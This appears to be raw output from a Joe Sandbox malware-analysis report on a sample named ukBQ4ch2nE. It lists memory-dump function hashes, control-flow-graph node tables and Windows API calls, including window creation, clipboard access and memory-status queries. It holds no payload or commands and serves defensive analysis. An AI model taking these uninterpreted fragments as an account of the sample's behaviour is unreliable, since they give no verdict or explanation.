                                                        • Instruction Fuzzy Hash: 7D22B271E002258FDF64DBA4C5806AEBBF2FF85320F248469E406AB395DB75ED41CB91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c8f20b3215f2a309d04a8e95d34dfcbe9155c2440ea1787e6f7d27c5e87874c
                                                        • Instruction ID: a25da255e70960ae50b3b149f0852dc5e7d770c4709e0cf0b7019619f7ce7e41
                                                        • Opcode Fuzzy Hash: 8c8f20b3215f2a309d04a8e95d34dfcbe9155c2440ea1787e6f7d27c5e87874c
                                                        • Instruction Fuzzy Hash: 2C629E34B00215AFDB54DB68D594AAEBBF2EF88310F248469E406DB395DB35ED42CB90
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ac1d35f4f92ace9b5349faae0d257a54b5445ae9540795983cdd328bf7393fd
                                                        • Instruction ID: 14f3e199403898aa81e6cc73a474141c7fb2160c0a7f02239601ce13e154a2ae
                                                        • Opcode Fuzzy Hash: 3ac1d35f4f92ace9b5349faae0d257a54b5445ae9540795983cdd328bf7393fd
                                                        • Instruction Fuzzy Hash: 1A329034F102199FDF54DB68D990BAEB7B2EB89310F108529E906EB355DB34EC42CB91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d186f7de5e5acf67bbb34fcbc8c7ee0b2ab06a70a9eeacb3ef70ea0281715663
                                                        • Instruction ID: 3e272455f45ee7dcc9256388c8549203c9a987eb91520b2a3f883cedd0bfa3a2
                                                        • Opcode Fuzzy Hash: d186f7de5e5acf67bbb34fcbc8c7ee0b2ab06a70a9eeacb3ef70ea0281715663
                                                        • Instruction Fuzzy Hash: B2229170E102198FDFA4CF69D5907AEB7B2EB85310F24852AE409DB395DB35DC81CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 663a910-663a92e 1 663a930-663a933 0->1 2 663a935-663a93e 1->2 3 663a94d-663a950 1->3 4 663ab47-663ab7e 2->4 5 663a944-663a948 2->5 6 663a952-663a95f 3->6 7 663a964-663a967 3->7 17 663ab80-663ab83 4->17 5->3 6->7 8 663a971-663a974 7->8 9 663a969-663a96e 7->9 10 663a97a-663a97d 8->10 11 663ab2d-663ab36 8->11 9->8 15 663a97f-663a983 10->15 16 663a98e-663a991 10->16 11->2 14 663ab3c-663ab46 11->14 15->14 20 663a989 15->20 21 663a993-663a9af 16->21 22 663a9b4-663a9b7 16->22 18 663aba6-663aba9 17->18 19 663ab85-663aba1 17->19 23 663abb6-663abb9 18->23 24 663abab-663abb5 18->24 19->18 20->16 21->22 25 663a9d1-663a9d4 22->25 26 663a9b9-663a9cc 22->26 29 663abbb call 663ae6a 23->29 30 663abc8-663abcb 23->30 27 663a9d6-663a9df 25->27 28 663a9e4-663a9e6 25->28 26->25 27->28 33 663a9e8 28->33 34 663a9ed-663a9f0 28->34 39 663abc1-663abc3 29->39 35 663abd1-663ac0c 30->35 36 663ae34-663ae37 30->36 33->34 34->1 38 663a9f6-663aa1a 34->38 50 663ac12-663ac1e 35->50 51 663adff-663ae12 35->51 42 663ae39-663ae3d 36->42 43 663ae48-663ae4a 36->43 55 663aa20-663aa2f 38->55 56 663ab2a 38->56 39->30 42->35 47 663ae43 42->47 44 663ae51-663ae54 43->44 45 663ae4c 43->45 44->17 48 663ae5a-663ae64 44->48 45->44 47->43 58 663ac20-663ac39 50->58 59 663ac3e-663ac82 50->59 52 663ae14 51->52 57 663ae15 52->57 62 663aa31-663aa37 55->62 63 663aa47-663aa82 call 66361e8 55->63 56->11 57->57 58->52 75 663ac84-663ac96 59->75 76 663ac9e-663acdd 59->76 65 663aa3b-663aa3d 62->65 66 663aa39 62->66 82 663aa84-663aa8a 63->82 83 663aa9a-663aab1 63->83 65->63 66->63 75->76 80 663ace3-663adbe call 66361e8 76->80 81 663adc4-663add9 76->81 80->81 81->51 85 663aa8e-663aa90 82->85 86 663aa8c 82->86 93 663aab3-663aab9 83->93 94 663aac9-663aada 83->94 85->83 86->83 95 663aabb 93->95 96 663aabd-663aabf 93->96 99 663aaf2-663ab23 94->99 100 663aadc-663aae2 94->100 95->94 96->94 99->56 102 663aae6-663aae8 100->102 103 663aae4 100->103 102->99 103->99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-1110479544
                                                        • Opcode ID: 5e7134433e080bc7d0e009e8d403eca14dfb73f380749adbf80643b20765c1b0
                                                        • Instruction ID: a5a8e140537153c7384c7f5442011f2b9812b93c4471231cc56c8454881aabc6
                                                        • Opcode Fuzzy Hash: 5e7134433e080bc7d0e009e8d403eca14dfb73f380749adbf80643b20765c1b0
                                                        • Instruction Fuzzy Hash: 65E18031E1021A8FCF65DFA5D5906AEB7F2FF85300F208529E446EB394EB359842DB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 253 65e6e41-65e6e48 254 65e6e4a-65e6e4b 253->254 255 65e6e51-65e6edf GetCurrentProcess 253->255 254->255 259 65e6ee8-65e6f1c GetCurrentThread 255->259 260 65e6ee1-65e6ee7 255->260 261 65e6f1e-65e6f24 259->261 262 65e6f25-65e6f59 GetCurrentProcess 259->262 260->259 261->262 264 65e6f5b-65e6f61 262->264 265 65e6f62-65e6f7d call 65e7020 262->265 264->265 268 65e6f83-65e6fb2 GetCurrentThreadId 265->268 269 65e6fbb-65e701d 268->269 270 65e6fb4-65e6fba 268->270 270->269
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 065E6ECE
                                                        • GetCurrentThread.KERNEL32 ref: 065E6F0B
                                                        • GetCurrentProcess.KERNEL32 ref: 065E6F48
                                                        • GetCurrentThreadId.KERNEL32 ref: 065E6FA1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 7623e3d2c64a51d3ed3a24296c5ab83b90db486f735e70a692a4be235c6cd786
                                                        • Instruction ID: 2abc3468c31e105f69a619b28ec9a942b00605d0010a130e40d343d9a56ccfee
                                                        • Opcode Fuzzy Hash: 7623e3d2c64a51d3ed3a24296c5ab83b90db486f735e70a692a4be235c6cd786
                                                        • Instruction Fuzzy Hash: 755167B0900649CFDB98CFAAC948B9EBBF1FF48310F248459E019A72A1DB755944CF65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 277 65e6e50-65e6edf GetCurrentProcess 282 65e6ee8-65e6f1c GetCurrentThread 277->282 283 65e6ee1-65e6ee7 277->283 284 65e6f1e-65e6f24 282->284 285 65e6f25-65e6f59 GetCurrentProcess 282->285 283->282 284->285 287 65e6f5b-65e6f61 285->287 288 65e6f62-65e6f7d call 65e7020 285->288 287->288 291 65e6f83-65e6fb2 GetCurrentThreadId 288->291 292 65e6fbb-65e701d 291->292 293 65e6fb4-65e6fba 291->293 293->292
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 065E6ECE
                                                        • GetCurrentThread.KERNEL32 ref: 065E6F0B
                                                        • GetCurrentProcess.KERNEL32 ref: 065E6F48
                                                        • GetCurrentThreadId.KERNEL32 ref: 065E6FA1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 905c6eb8a04ff8d177027c297645c5c87a763264c901c9e19a73ae561f0f6092
                                                        • Instruction ID: 2d7ed5b08684448ff4888f5c4c1ab632356ac6e898aae5995b23829419352b7b
                                                        • Opcode Fuzzy Hash: 905c6eb8a04ff8d177027c297645c5c87a763264c901c9e19a73ae561f0f6092
                                                        • Instruction Fuzzy Hash: 835155B0D00249CFDB98CFAAC948B9EBBF1EF88310F248459E419A73A0DB355944CF65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 300 6638d98-6638dbd 301 6638dbf-6638dc2 300->301 302 6639680-6639683 301->302 303 6638dc8-6638ddd 301->303 304 6639685-66396a4 302->304 305 66396a9-66396ab 302->305 310 6638df5-6638e0b 303->310 311 6638ddf-6638de5 303->311 304->305 306 66396b2-66396b5 305->306 307 66396ad 305->307 306->301 309 66396bb-66396c5 306->309 307->306 317 6638e16-6638e18 310->317 313 6638de7 311->313 314 6638de9-6638deb 311->314 313->310 314->310 318 6638e30-6638ea1 317->318 319 6638e1a-6638e20 317->319 330 6638ea3-6638ec6 318->330 331 6638ecd-6638ee9 318->331 320 6638e22 319->320 321 6638e24-6638e26 319->321 320->318 321->318 330->331 336 6638f15-6638f30 331->336 337 6638eeb-6638f0e 331->337 342 6638f32-6638f54 336->342 343 6638f5b-6638f76 336->343 337->336 342->343 348 6638f9b-6638fa9 343->348 349 6638f78-6638f94 343->349 350 6638fab-6638fb4 348->350 351 6638fb9-6639033 348->351 349->348 350->309 357 6639080-6639095 351->357 358 6639035-6639053 351->358 357->302 362 6639055-6639064 358->362 363 663906f-663907e 358->363 362->363 363->357 363->358
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq
                                                        • API String ID: 0-812946093
                                                        • Opcode ID: 95b61fcdca3f24353c41e2d07839a85b4326b9360be36eb2a9f145dc1d82e328
                                                        • Instruction ID: 6229f7ff8f4859eba8d621fba4536010dd70318390006afb8a0a5c068c2f4bdd
                                                        • Opcode Fuzzy Hash: 95b61fcdca3f24353c41e2d07839a85b4326b9360be36eb2a9f145dc1d82e328
                                                        • Instruction Fuzzy Hash: 45913F30F0061A8BDB54DB75D9507AFB7F6EB85300F108569D4099B398FB719D42CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 366 663cfa0-663cfbb 367 663cfbd-663cfc0 366->367 368 663cfc2-663d004 367->368 369 663d009-663d00c 367->369 368->369 370 663d055-663d058 369->370 371 663d00e-663d050 369->371 373 663d075-663d078 370->373 374 663d05a-663d070 370->374 371->370 375 663d0c1-663d0c4 373->375 376 663d07a-663d089 373->376 374->373 381 663d0c6-663d108 375->381 382 663d10d-663d110 375->382 378 663d08b-663d090 376->378 379 663d098-663d0a4 376->379 378->379 385 663d0aa-663d0bc 379->385 386 663d9bd-663d9f6 379->386 381->382 387 663d112-663d154 382->387 388 663d159-663d15c 382->388 385->375 405 663d9f8-663d9fb 386->405 387->388 389 663d162-663d165 388->389 390 663d48c-663d498 388->390 394 663d167-663d1a9 389->394 395 663d1ae-663d1b1 389->395 390->376 400 663d49e-663d78b 390->400 394->395 403 663d1b3-663d1b8 395->403 404 663d1bb-663d1be 395->404 578 663d9b2-663d9bc 400->578 579 663d791-663d797 400->579 403->404 410 663d1c0-663d1cf 404->410 411 663d207-663d20a 404->411 412 663da0a-663da0d 405->412 413 663d9fd call 663db15 405->413 414 663d1d1-663d1d6 410->414 415 663d1de-663d1ea 410->415 418 663d253-663d256 411->418 419 663d20c-663d24e 411->419 416 663da30-663da33 412->416 417 663da0f-663da2b 412->417 422 663da03-663da05 413->422 414->415 415->386 429 663d1f0-663d202 415->429 427 663da66-663da68 416->427 428 663da35-663da61 416->428 417->416 424 663d279-663d27c 418->424 425 663d258-663d274 418->425 419->418 422->412 433 663d28b-663d28e 424->433 434 663d27e-663d280 424->434 425->424 435 663da6a 427->435 436 663da6f-663da72 427->436 428->427 429->411 444 663d290-663d2d2 433->444 445 663d2d7-663d2da 433->445 442 663d347-663d350 434->442 443 663d286 434->443 435->436 436->405 446 663da74-663da83 436->446 450 663d352-663d357 442->450 451 663d35f-663d36b 442->451 443->433 444->445 453 663d2e9-663d2ec 445->453 454 663d2dc-663d2de 445->454 470 663da85-663dae8 call 66361e8 446->470 471 663daea-663daff 446->471 450->451 459 663d371-663d385 451->459 460 663d47c-663d481 451->460 465 663d335-663d337 453->465 466 663d2ee-663d330 453->466 463 663d2e4 454->463 464 663d489 454->464 459->464 480 663d38b-663d39d 459->480 460->464 463->453 464->390 468 663d339 465->468 469 663d33e-663d341 465->469 466->465 468->469 469->367 469->442 470->471 492 663d3c1-663d3c3 480->492 493 663d39f-663d3a5 480->493 502 663d3cd-663d3d9 492->502 495 663d3a7 493->495 496 663d3a9-663d3b5 493->496 500 663d3b7-663d3bf 495->500 496->500 500->502 509 663d3e7 502->509 510 663d3db-663d3e5 502->510 512 663d3ec-663d3ee 509->512 510->512 512->464 514 663d3f4-663d410 call 66361e8 512->514 523 663d412-663d417 514->523 524 663d41f-663d42b 514->524 523->524 524->460 526 663d42d-663d47a 524->526 526->464 580 663d7a6-663d7af 579->580 581 663d799-663d79e 579->581 580->386 582 663d7b5-663d7c8 580->582 581->580 584 663d9a2-663d9ac 582->584 585 663d7ce-663d7d4 582->585 584->578 584->579 586 663d7e3-663d7ec 585->586 587 663d7d6-663d7db 585->587 586->386 588 663d7f2-663d813 586->588 587->586 591 663d822-663d82b 588->591 592 663d815-663d81a 588->592 591->386 593 663d831-663d84e 591->593 592->591 593->584 596 663d854-663d85a 593->596 596->386 597 663d860-663d879 596->597 599 663d995-663d99c 597->599 600 663d87f-663d8a6 597->600 599->584 599->596 600->386 603 663d8ac-663d8b6 600->603 603->386 604 663d8bc-663d8d3 603->604 606 663d8e2-663d8fd 604->606 607 663d8d5-663d8e0 604->607 606->599 612 663d903-663d91c call 66361e8 606->612 607->606 616 663d92b-663d934 612->616 617 663d91e-663d923 612->617 616->386 618 663d93a-663d98e 616->618 617->616 618->599
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq
                                                        • API String ID: 0-177832560
                                                        • Opcode ID: d772bb903bcd2e0e697f3c2fe2af0d6e2f8c9d9d3ba048abad10f9faea946d0d
                                                        • Instruction ID: 4f73c011530f399fec62f4dc948b31d3c7787874adbf0c38ef0c75db262a72cc
                                                        • Opcode Fuzzy Hash: d772bb903bcd2e0e697f3c2fe2af0d6e2f8c9d9d3ba048abad10f9faea946d0d
                                                        • Instruction Fuzzy Hash: 89627230A102168FCB55EF69D690A5EB7F2FF85300F248968D4069F359EB71ED86CB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 626 66347b0-66347d4 627 66347d6-66347d9 626->627 628 66347db-66347f5 627->628 629 66347fa-66347fd 627->629 628->629 630 6634801-66348fb 629->630 631 6634edc-6634ede 629->631 649 6634901-663494e call 6635058 630->649 650 663497e-6634985 630->650 632 6634ee0 631->632 633 6634ee5-6634ee8 631->633 632->633 633->627 636 6634eee-6634efb 633->636 663 6634954-6634970 649->663 651 663498b-66349fb 650->651 652 6634a09-6634a12 650->652 669 6634a06 651->669 670 66349fd 651->670 652->636 667 6634972 663->667 668 663497b-663497c 663->668 667->668 668->650 669->652 670->669
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fjq$XPjq$\Ojq
                                                        • API String ID: 0-216941231
                                                        • Opcode ID: 321e2044f453affb90b4ccbb1ca60b81d208c0c3cb83a48395cc6eb734f2606b
                                                        • Instruction ID: 3cd7a6a250e43dc4d1e892117f097d1e85b6f84c6c6e6dd55eba003948cc9377
                                                        • Opcode Fuzzy Hash: 321e2044f453affb90b4ccbb1ca60b81d208c0c3cb83a48395cc6eb734f2606b
                                                        • Instruction Fuzzy Hash: C8616C70E002189FEB549FA5C8547AEBBF6EF88700F20802AE506AB395DF758D458B91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1582 6638d89-6638dbd 1583 6638dbf-6638dc2 1582->1583 1584 6639680-6639683 1583->1584 1585 6638dc8-6638ddd 1583->1585 1586 6639685-66396a4 1584->1586 1587 66396a9-66396ab 1584->1587 1592 6638df5-6638e0b 1585->1592 1593 6638ddf-6638de5 1585->1593 1586->1587 1588 66396b2-66396b5 1587->1588 1589 66396ad 1587->1589 1588->1583 1591 66396bb-66396c5 1588->1591 1589->1588 1599 6638e16-6638e18 1592->1599 1595 6638de7 1593->1595 1596 6638de9-6638deb 1593->1596 1595->1592 1596->1592 1600 6638e30-6638ea1 1599->1600 1601 6638e1a-6638e20 1599->1601 1612 6638ea3-6638ec6 1600->1612 1613 6638ecd-6638ee9 1600->1613 1602 6638e22 1601->1602 1603 6638e24-6638e26 1601->1603 1602->1600 1603->1600 1612->1613 1618 6638f15-6638f30 1613->1618 1619 6638eeb-6638f0e 1613->1619 1624 6638f32-6638f54 1618->1624 1625 6638f5b-6638f76 1618->1625 1619->1618 1624->1625 1630 6638f9b-6638fa9 1625->1630 1631 6638f78-6638f94 1625->1631 1632 6638fab-6638fb4 1630->1632 1633 6638fb9-6639033 1630->1633 1631->1630 1632->1591 1639 6639080-6639095 1633->1639 1640 6639035-6639053 1633->1640 1639->1584 1644 6639055-6639064 1640->1644 1645 663906f-663907e 1640->1645 1644->1645 1645->1639 1645->1640
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq
                                                        • API String ID: 0-2246304398
                                                        • Opcode ID: f9066fd6614df58d7665f35dfb6488c78efc850e11624f669622d87de0201a23
                                                        • Instruction ID: 553a0c2ca2e37f70b67e7e18dff81064a0cfb7f8d84fdcfda56c451c78ccc9f1
                                                        • Opcode Fuzzy Hash: f9066fd6614df58d7665f35dfb6488c78efc850e11624f669622d87de0201a23
                                                        • Instruction Fuzzy Hash: 57514E30B006169FDB54EB74DA60BAF77F6EB88200F10846DD506DB398EB71AC42CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1684 66347a0-66347ac 1685 6634801-66348fb 1684->1685 1686 66347ae-66347d4 1684->1686 1708 6634901-663494e call 6635058 1685->1708 1709 663497e-6634985 1685->1709 1687 66347d6-66347d9 1686->1687 1689 66347db-66347f5 1687->1689 1690 66347fa-66347fd 1687->1690 1689->1690 1690->1685 1691 6634edc-6634ede 1690->1691 1693 6634ee0 1691->1693 1694 6634ee5-6634ee8 1691->1694 1693->1694 1694->1687 1696 6634eee-6634efb 1694->1696 1722 6634954-6634970 1708->1722 1710 663498b-66349fb 1709->1710 1711 6634a09-6634a12 1709->1711 1728 6634a06 1710->1728 1729 66349fd 1710->1729 1711->1696 1726 6634972 1722->1726 1727 663497b-663497c 1722->1727 1726->1727 1727->1709 1728->1711 1729->1728
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fjq$XPjq
                                                        • API String ID: 0-1938862144
                                                        • Opcode ID: acbdbcbb47f692c804969222b6d4b0c81e26ec1db767a6f8cc3d70473628d467
                                                        • Instruction ID: d94acb9b2df7124da94c36def60e05fdd1a5471cd01e55cc530bc1c7ffe74983
                                                        • Opcode Fuzzy Hash: acbdbcbb47f692c804969222b6d4b0c81e26ec1db767a6f8cc3d70473628d467
                                                        • Instruction Fuzzy Hash: F1516D70F002189FEB55DFA5C854BAFBBF6EF88700F20856AE105AB395DE749C018B91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1912 65e344d-65e34be 1914 65e34c9-65e34d0 1912->1914 1915 65e34c0-65e34c6 1912->1915 1916 65e34db-65e3513 1914->1916 1917 65e34d2-65e34d8 1914->1917 1915->1914 1918 65e351b-65e357a CreateWindowExW 1916->1918 1917->1916 1919 65e357c-65e3582 1918->1919 1920 65e3583-65e35bb 1918->1920 1919->1920 1924 65e35bd-65e35c0 1920->1924 1925 65e35c8 1920->1925 1924->1925 1926 65e35c9 1925->1926 1926->1926
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065E356A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 495c3f3f68f2cf758bf15e93d53e79a2a3e08d207cf1f5e38ce0424898d4c103
                                                        • Instruction ID: 85232976d93bc2ad27227f9d991eb50c35f77435a088189da85dc207275d9b3b
                                                        • Opcode Fuzzy Hash: 495c3f3f68f2cf758bf15e93d53e79a2a3e08d207cf1f5e38ce0424898d4c103
                                                        • Instruction Fuzzy Hash: DD51C1B1D00309AFDF14CF9AC884ADEBBB5FF48310F24812AE419AB210D7759945CF90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1927 65e3458-65e34be 1928 65e34c9-65e34d0 1927->1928 1929 65e34c0-65e34c6 1927->1929 1930 65e34db-65e357a CreateWindowExW 1928->1930 1931 65e34d2-65e34d8 1928->1931 1929->1928 1933 65e357c-65e3582 1930->1933 1934 65e3583-65e35bb 1930->1934 1931->1930 1933->1934 1938 65e35bd-65e35c0 1934->1938 1939 65e35c8 1934->1939 1938->1939 1940 65e35c9 1939->1940 1940->1940
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065E356A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: f3219e196255fcb4ed025bcfb2ead9ed01fd0dbdb5547640b7b135a5504e04e7
                                                        • Instruction ID: b68560b27f467505cc8a70d58b5ab4ed256fbd4d9c9407dfd380ba781581adfe
                                                        • Opcode Fuzzy Hash: f3219e196255fcb4ed025bcfb2ead9ed01fd0dbdb5547640b7b135a5504e04e7
                                                        • Instruction Fuzzy Hash: 6A41BEB1D00349DFDF14CF9AC984ADEBBB5BF88310F64862AE819AB210D7759945CF90
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 065E7FE9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: 870cbaaa67eb6a8d3a84bdb0105a6586adafd697ee75425ad74b9f0b19bc62c4
                                                        • Instruction ID: d52cfa544e10d62e5d654f3006b45910de8a751c911d0b73b5f28f512ed1dd14
                                                        • Opcode Fuzzy Hash: 870cbaaa67eb6a8d3a84bdb0105a6586adafd697ee75425ad74b9f0b19bc62c4
                                                        • Instruction Fuzzy Hash: 12411BB8900345CFDB54CF99C448AAABBF5FF8C314F248859E519AB321D375A841CFA0
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00B9F7DF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 4e3f22f475c1c35540d72753a1ad3e9dd20a0af2f78d1227a793d9585cec3356
                                                        • Instruction ID: fe5795d8e45ef11c01c828a17666539ed1071aea930d768a4e8da8732c5e8810
                                                        • Opcode Fuzzy Hash: 4e3f22f475c1c35540d72753a1ad3e9dd20a0af2f78d1227a793d9585cec3356
                                                        • Instruction Fuzzy Hash: 1C31CBB1D042998FCB10CFA9D4457EEBFF5AF49320F2485AAD804E7251DB789804CBE2
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 065E2416
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 39d3c3602118b2643abf3cc467fa335a201f19f71b9a777c89cdb92e959e3bdd
                                                        • Instruction ID: b2702c43b5d99f1e5aa84da5e859935325cdd9a577a044dd68e47fb3a3700dd4
                                                        • Opcode Fuzzy Hash: 39d3c3602118b2643abf3cc467fa335a201f19f71b9a777c89cdb92e959e3bdd
                                                        • Instruction Fuzzy Hash: 5031D0B0D043858FCB19CF7AC81469EBFF9AF8A310F14859AD055E7292C7789905CFA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: Clipboard
                                                        • String ID:
                                                        • API String ID: 220874293-0
                                                        • Opcode ID: 83317a0edccb66080b9c01c1c8cdc5a63d243edd2228ee80ad299373c7cdf31c
                                                        • Instruction ID: 12caee2c6f0379badb4de257ea4f6dd5de91f62da33b4f0c1fc6e050c79a6854
                                                        • Opcode Fuzzy Hash: 83317a0edccb66080b9c01c1c8cdc5a63d243edd2228ee80ad299373c7cdf31c
                                                        • Instruction Fuzzy Hash: B131F0B4D01249EFDB24CF99C984BCEBBF5AF48314F24845AE404AB290C7B56845CB91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: Clipboard
                                                        • String ID:
                                                        • API String ID: 220874293-0
                                                        • Opcode ID: bbeb73d96a33fa91b14befb732b39163490fa2833ceb0c33c04dfc574cbf2a52
                                                        • Instruction ID: 918a7c1f116046b8248ab6260e46fe6c1a1ebfbf4eed9ca9f7710b2251992b40
                                                        • Opcode Fuzzy Hash: bbeb73d96a33fa91b14befb732b39163490fa2833ceb0c33c04dfc574cbf2a52
